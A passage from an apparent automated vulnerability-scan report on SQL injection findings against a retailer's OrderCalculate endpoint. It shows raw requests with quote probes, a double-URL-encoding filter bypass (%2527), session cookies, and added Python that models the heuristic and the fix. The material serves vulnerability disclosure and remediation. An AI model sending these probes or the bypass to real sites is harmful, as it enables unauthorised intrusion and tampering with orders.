Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:40:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:40:54 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224454064%3a%3bC25%5fEXP%3d1360064454%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:40:54 GMT;Path=/


1.70. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [jspStoreDir parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The jspStoreDir parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the jspStoreDir parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The only evidence is the differential between the two probes: Response 1 below is a 207104-byte page that includes the GenericError.jsp template, while Response 2 is a 200 with Content-Length: 0. An empty body shows that the error page was not rendered, not that the doubled quote was processed as a normal value, which is why confidence stays Tentative until the underlying error, or a boolean or time-based differential, has been confirmed by hand. Note also that every probe to this URL carries itemAdd=true and quantity=1; the THD_PERSIST and THD_SESSION cookies set in the responses on this page carry a C6 field whose I1 and D1 values climb from probe to probe (3 / $5,197.00, 44 / $62,556.00, 127 / $178,673.00, 217 / $304,583.00), which is consistent with each scanner request adding to the session's cart. Re-testing should use a disposable session and, where possible, a request that does not mutate order state.

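The heuristic behind findings 1.70, 1.71 and 1.72 rests on one SQL grammar rule: inside a single-quoted literal, a lone ' terminates the string early and a doubled '' is an escaped quote. The following Python, added here and not part of the XSS.CX report or of the target application, reproduces that rule against an in-memory SQLite table (the store table and its columns are assumptions, used only to model concatenated SQL) and then applies the scanner's pairing rule to constructed stand-ins for the two OrderCalculate responses, including the empty-200 caveat noted above.

```python
"""Quote / double-quote differential used for findings 1.70-1.72.

Added example, not part of the report or the target application.
The store table and the in-memory SQLite database are assumptions;
they only model the SQL grammar rule the heuristic relies on.
"""
import sqlite3

# Template name visible in the body of every "Response 1" (the error
# page) on this page and absent from every "Response 2".
ERROR_MARKER = "GenericError.jsp"


def probe_sqlite(value: str) -> str:
    """Splice the value into SQL text (the bug being hunted) and report
    whether the database accepts the statement.

    hdus'   -> '...hdus''   : unterminated literal, syntax error
    hdus''  -> '...hdus'''  : doubled quote is an escaped quote, valid
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE store (dir TEXT, name TEXT)")  # assumed schema
    conn.execute("INSERT INTO store VALUES ('hdus', 'US store')")
    query = "SELECT name FROM store WHERE dir = '%s'" % value  # deliberately unsafe
    try:
        conn.execute(query).fetchall()
        return "ok"
    except sqlite3.OperationalError:
        return "error"
    finally:
        conn.close()


def classify_pair(resp_single: dict, resp_double: dict) -> str:
    """Apply the scanner's rule to a captured response pair.

    Each dict mimics the fields the report shows: status, Content-Length
    and body.  Returns the confidence label a reviewer should attach.
    """
    err_single = ERROR_MARKER in resp_single["body"]
    err_double = ERROR_MARKER in resp_double["body"]
    if not (err_single and not err_double):
        return "no evidence"
    # An empty 200 only shows the error page was not rendered; it is not
    # proof that the doubled quote was processed as a normal value.
    if resp_double["content_length"] == 0:
        return "tentative (second response empty, confirm manually)"
    return "tentative"


# Constructed stand-ins for the two responses shown under 1.70:
# Response 1 (jspStoreDir=hdus') rendered GenericError.jsp at 207104 bytes,
# Response 2 (jspStoreDir=hdus'') came back as 200 with Content-Length: 0.
RESPONSE_SINGLE_QUOTE = {
    "status": 200,
    "content_length": 207104,
    "body": "<!DOCTYPE html ...><!-- Stores\\Web Content\\GenericError.jsp -->",
}
RESPONSE_DOUBLE_QUOTE = {"status": 200, "content_length": 0, "body": ""}


def run_demo() -> dict:
    """Run both halves and return the results for inspection."""
    return {
        "single": probe_sqlite("hdus'"),
        "double": probe_sqlite("hdus''"),
        "verdict": classify_pair(RESPONSE_SINGLE_QUOTE, RESPONSE_DOUBLE_QUOTE),
    }


if __name__ == "__main__":
    for key, result in run_demo().items():
        print(f"{key}: {result}")
```

The same two functions apply unchanged to 1.71 (where the quote arrives as %2527) and to 1.72 (where it sits in the s_vi cookie); only the injection point differs, the response pairing rule does not.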
Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus'&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:41:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:41:17 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224466568%3a%3bC25%5fEXP%3d1360064466%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:41:06 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224466568%3a%3bC25%5fEXP%3d1360064466%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:41:12 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%2244%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%2462%2c556%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816472%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224466568%3a%3bC25%5fEXP%3d1360064466%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:41:12 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228072822%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cCtHCPHu0Jmb4ir2hrdcn6I4AQiE%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus''&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:41:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:41:18 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224478075%3a%3bC25%5fEXP%3d1360064478%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:41:18 GMT;Path=/


1.71. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [langId parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The langId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the langId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by double URL-encoding the blocked characters, for example by submitting %2527 instead of the ' character. Request 1 below sends langId=-1%2527 and reaches the GenericError.jsp page; Request 2 sends langId=-1%2527%2527 and returns an empty 200. That is the same differential as in 1.70, reached through the encoded form, which indicates that whatever filters the quote inspects the value after the web server's single decode but before the application decodes it a second time.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the langId request parameter, as the web server will already have carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, never before it. For langId specifically, every legitimate request on this page sends -1, so an allow-list check that the decoded value is an integer rejects both the %27 and the %2527 forms; the value should then be bound as a query parameter rather than concatenated into SQL text.
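The bypass and the fix, as an added Python example that is not code from the report or from the target application: blocklist_then_decode models the layout the issue detail describes (server decode, quote filter, second application decode), validate_lang_id is the decode-once-then-allow-list alternative, and lookup_language binds the validated value as a parameter. The filter, the language table and the SQLite database are assumptions used to model the behaviour.

```python
"""Why %2527 slips past a filter that runs before a second URL-decode,
and the validate-after-canonicalisation fix for finding 1.71.

Added example, not code from the report or the target application.
The filter, the language table and the in-memory SQLite database are
assumptions that model the behaviour described in the issue detail.
"""
import re
import sqlite3
from typing import Optional
from urllib.parse import unquote


def blocklist_then_decode(raw: str) -> Optional[str]:
    """Model of the bypassable layout: the web server decodes once, a quote
    filter runs, then the application decodes again.

    Returns the value the application ends up using, or None if blocked.
    """
    after_server_decode = unquote(raw)          # %2527 -> %27, %27 -> '
    if "'" in after_server_decode:              # filter sees %27, not a quote
        return None
    return unquote(after_server_decode)         # second decode: %27 -> '


def validate_lang_id(raw: str) -> int:
    """Hardened form: decode exactly once, then allow-list the result.

    langId is numeric (-1 in every request on this page), so anything that
    is not an optionally signed integer is rejected, whichever encoding
    layer a quote hides behind.
    """
    value = unquote(raw)
    if not re.fullmatch(r"-?\d+", value):
        raise ValueError(f"langId is not an integer: {value!r}")
    return int(value)


def lookup_language(raw: str) -> Optional[str]:
    """Validate, then bind the value as a parameter instead of splicing it
    into the SQL text.  Table and rows are assumed."""
    lang_id = validate_lang_id(raw)
    conn = sqlite3.connect(":memory:")
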